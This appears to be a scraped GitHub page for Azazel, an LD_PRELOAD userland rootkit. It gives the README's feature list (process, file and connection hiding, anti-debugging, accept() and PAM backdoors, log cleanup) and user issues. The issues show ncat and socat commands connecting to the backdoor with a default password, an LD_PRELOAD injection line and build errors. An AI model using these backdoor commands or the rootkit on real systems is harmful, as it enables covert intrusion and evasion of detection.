chokepoint / azazel Goto Github PK

Azazel is a userland rootkit based off of the original LD_PRELOAD technique from Jynx rootkit. It is more robust and has additional features, and focuses heavily around anti-debugging and anti-detection.

License: GNU General Public License v2.0

Makefile 1.64% C 87.43% Python 10.93%

azazel's Introduction

Azazel

V 0.1

The whole earth has been corrupted through the works that were taught by Azazel: to him ascribe all sin. -- 1 Enoch 2:8

Features

Anti-debugging
Avoids unhide, lsof, ps, ldd detection
Hides files and directories
Hides remote connections
Hides processes
Hides logins
PCAP hooks avoids local sniffing
Two accept backdoors.
Crypthook encrypted accept() backdoor -- Full PTY
Plaintext accept() backdoor -- Full PTY
PAM backdoor for local privesc and remote entry
Log cleanup for utmp/wtmp entries based on pty

Using netcat to communicate with a remote PTY isn't the best idea. See below for a better PTY client written by InfoDox, or use socat with a command similar to the following and then just paste the password into the session, otherwise socat send the first char making the passwords not match.

socat -,raw,echo=0 TCP:target:port,bind=:61040

Disclaimer

The authors are in no way responsible for any illegal use of this software. It is provided purely as an educational proof of concept. We are also not responsible for any damages or mishaps that may happen in the course of using this software. Use at your own risk.

azazel's People

Contributors

Stargazers

Watchers

Forkers

sjcappella bogde zeroday msherry shayanb tessi claudiouzelac sinatosk anymaster astavonin strcrzy void-in inike z4ziggy alaasalman kanner eabatalov alcherk extered mdisec wateroot hun7r sokolsg atimorin karlpilkington benfinke chronum chubbymaggie harvathsteven armuk snake2k glen-testing fastrom renjithsasidharan cnlouds lolrip isafe detrojones bahtiyarb-torba killvxk shiroy mlevitt krando cainiaocome dipsec derfirm night-codes z3v2cicidi shekkbuilder zhuyue1314 tuian kingjci jeffersonpig safe3 scuhurricane anhilo avgirl yd0str 453483289 timhsutw dr-syn cinno rskkkzt v0re tempbottle yuang1516 egypt frankurcrazy ycaihua gracesrm layerfsd fatenocaster a2si nullarray bb33bb izogain bossjones igpg jaonlin pynon ajgappmark joypark b0t0w1 smallmeet sagittarius-a xuzeyuanfred bijaye unforeseenocean archerbroler qingchen1984 connlan bongwa solertis al-ryan-breed bryant1410 clicknull kabadjo phenixrat007 taibaiyifeng zhengsyou

azazel's Issues

does not spawn shell indeed

:/$ ncat 192.168.136.142 22 -vvvp 61040
Ncat: Version 5.21 ( http://nmap.org/ncat )
NSOCK (0.0010s) TCP connection requested to 192.168.136.142:22 (IOD #1) EID 8
NSOCK (0.0010s) Callback: CONNECT SUCCESS for EID 8 [192.168.136.142:22]
Ncat: Connected to 192.168.136.142:22.
NSOCK (0.0010s) Read request from IOD #1 [192.168.136.142:22](timeout: -1ms) EID 18
NSOCK (0.0010s) Read request for 0 bytes from IOD #2 (peer unspecified) EID 26
changeme
NSOCK (11.8140s) Callback READ SUCCESS for EID 26 (peer unspecified) (9 bytes)
NSOCK (11.8140s) Write request for 9 bytes to IOD #1 EID 35 [192.168.136.142:22]
NSOCK (11.8140s) Callback: WRITE SUCCESS for EID 35 [192.168.136.142:22]
NSOCK (11.8140s) Read request for 0 bytes from IOD #2 (peer unspecified) EID 42
NSOCK (11.8140s) Callback: READ SUCCESS for EID 18 [192.168.136.142:22](25 bytes)
Welcome!
Here's a shell: NSOCK (11.8140s) Read request for 0 bytes from IOD #1 [192.168.136.142:22] EID 50
NSOCK (11.9590s) Callback: READ EOF for EID 50 [192.168.136.142:22]
Ncat: 9 bytes sent, 25 bytes received in 11.96 seconds.
NSOCK (11.9590s) Callback: READ KILL for EID 42 (peer unspecified)

No firewall on either side. Only pam worked for me

Cannot get working

root@cp-ub10-01:# git clone https://github.com/chokepoint/azazel.git
Initialized empty Git repository in /root/azazel/.git/
remote: Counting objects: 44, done.
remote: Compressing objects: 100% (37/37), done.
remote: Total 44 (delta 14), reused 37 (delta 7)
Unpacking objects: 100% (44/44), done.
root@cp-ub10-01:# cd azazel/
root@cp-ub10-01:/azazel# ls
azazel.c azazel.h client.c config.py const.h crypthook.c crypthook.h LICENSE Makefile pam.c pcap.c pcap.h README.md xor.c xor.h
root@cp-ub10-01:/azazel# make
cc -fPIC -g -c azazel.c pam.c xor.c crypthook.c pcap.c
pam.c:8:31: error: security/pam_appl.h: No such file or directory
pam.c:9:34: error: security/pam_modules.h: No such file or directory
pam.c:16: error: expected ‘)’ before ‘’ token
pam.c:36: error: expected ‘)’ before ‘’ token
pam.c:103: error: expected ‘)’ before ‘’ token
pam.c:123: error: expected ‘)’ before ‘’ token
crypthook.c:11:25: error: openssl/evp.h: No such file or directory
crypthook.c:12:25: error: openssl/sha.h: No such file or directory
crypthook.c:13:26: error: openssl/rand.h: No such file or directory
crypthook.c: In function ‘gen_key’:
crypthook.c:42: warning: incompatible implicit declaration of built-in function ‘free’
crypthook.c: In function ‘encrypt_data’:
crypthook.c:63: error: ‘EVP_CIPHER_CTX’ undeclared (first use in this function)
crypthook.c:63: error: (Each undeclared identifier is reported only once
crypthook.c:63: error: for each function it appears in.)
crypthook.c:63: error: ‘ctx’ undeclared (first use in this function)
crypthook.c:78: error: ‘EVP_CTRL_GCM_GET_TAG’ undeclared (first use in this function)
crypthook.c: In function ‘decrypt_data’:
crypthook.c:115: error: ‘EVP_CIPHER_CTX’ undeclared (first use in this function)
crypthook.c:115: error: ‘ctx’ undeclared (first use in this function)
crypthook.c:120: error: ‘EVP_CTRL_GCM_SET_IVLEN’ undeclared (first use in this function)
crypthook.c:127: error: ‘EVP_CTRL_GCM_SET_TAG’ undeclared (first use in this function)
pcap.c:1:23: error: pcap/pcap.h: No such file or directory
In file included from pcap.c:4:
azazel.h:23: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘attribute’ before ‘’ token
In file included from pcap.c:5:
pcap.h:8: error: expected ‘)’ before ‘’ token
pcap.h:9: warning: ‘struct pcap_pkthdr’ declared inside parameter list
pcap.h:9: warning: its scope is only this definition or declaration, which is probably not what you want
pcap.h:10: warning: ‘struct pcap_pkthdr’ declared inside parameter list
pcap.c:7: warning: ‘struct pcap_pkthdr’ declared inside parameter list
pcap.c:7: error: conflicting types for ‘got_packet’
pcap.h:10: note: previous declaration of ‘got_packet’ was here
pcap.c: In function ‘got_packet’:
pcap.c:27: warning: passing argument 2 of ‘old_callback’ from incompatible pointer type
pcap.c:27: note: expected ‘const struct pcap_pkthdr ’ but argument is of type ‘const struct pcap_pkthdr *’
pcap.c:47: warning: passing argument 2 of ‘old_callback’ from incompatible pointer type
pcap.c:47: note: expected ‘const struct pcap_pkthdr *’ but argument is of type ‘const struct pcap_pkthdr *’
pcap.c: At top level:
pcap.c:54: error: expected ‘)’ before ‘’ token
make: *** [libselinux.so] Error 1
root@cp-ub10-01:~/azazel#

and on Kali:

root@Kali:# git clone https://github.com/chokepoint/azazel.git
Cloning into 'azazel'...
remote: Counting objects: 44, done.
remote: Compressing objects: 100% (37/37), done.
remote: Total 44 (delta 14), reused 37 (delta 7)
Unpacking objects: 100% (44/44), done.
root@Kali:# cd azazel/
root@Kali:/azazel# make
cc -fPIC -g -c azazel.c pam.c xor.c crypthook.c pcap.c
pam.c:8:31: fatal error: security/pam_appl.h: No such file or directory
compilation terminated.
make: *** [libselinux.so] Error 1
root@Kali:/azazel#

Any ideas?

too bad this isn't mantained

Too bad this isn't maintained! It would have been a great example of code and teaching cool for all the black/grey/white hats out there!

Stack overflow error.

Azazel suffers a stack overflow bug on wtmp_clean && utmp_clean,
because they use hooked open() instead of libc's open() function,
making calls to is_owner() recursive when HIDE_THIS_SHELL env var is set.

Crash in pam_acct_mgmt hook on RHEL 6

It seems that there is a plethora of unhappiness on RHEL revolving around the PAM implementation. I've tried to address it, but have run out of time and don't know PAM all that well. So far i have found the following:

When running SU, pam_acct_mgmt calls to pam_sm_authenticate (when defined, but its not by default). Azazel defines this function, which means that the init function winds up with a NULL pointer for pam_sm_authenticate in the symbols table.

SSH is closing connections after bash is hooked

After installation, I ran the command; LD_PRELOAD=/lib/libselinux.so bash -l
Now, whenever I try to connect to SSH, it closes my connection. How can I prevent this from happening and allow SSH to let me in?

Ubuntu cannot be reboot

Ubuntu 12.04 can't reboot

didnot spawn the shell

hi . i am trying this rk and after i compile it. i tried both ways to use it one with the LD_PRELOAD and the other with make install method . and both works . only to the point that it start to spawn the /bin/bash , it is just didn't .
ex:
[root@pxe ~]# ncat 192.168.1.74 22 -p 41
medo
Welcome!
Here's a shell:

and then what ever i try to do it will give me

Ncat: Broken pipe.
i also tried with socat and same thing it just broke .

here it is the kernel
Linux localhost.localdomain 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

PS: tried other rk and they work fine like Jynx/Jynx2

Using ncat as a client for accept() hook is flawed idea

tl;dr ncat makes a crap client for PTY's. A simple modification of the following should work though:

https://github.com/infodox/python-pty-shells/blob/master/tcp_pty_shell_handler.py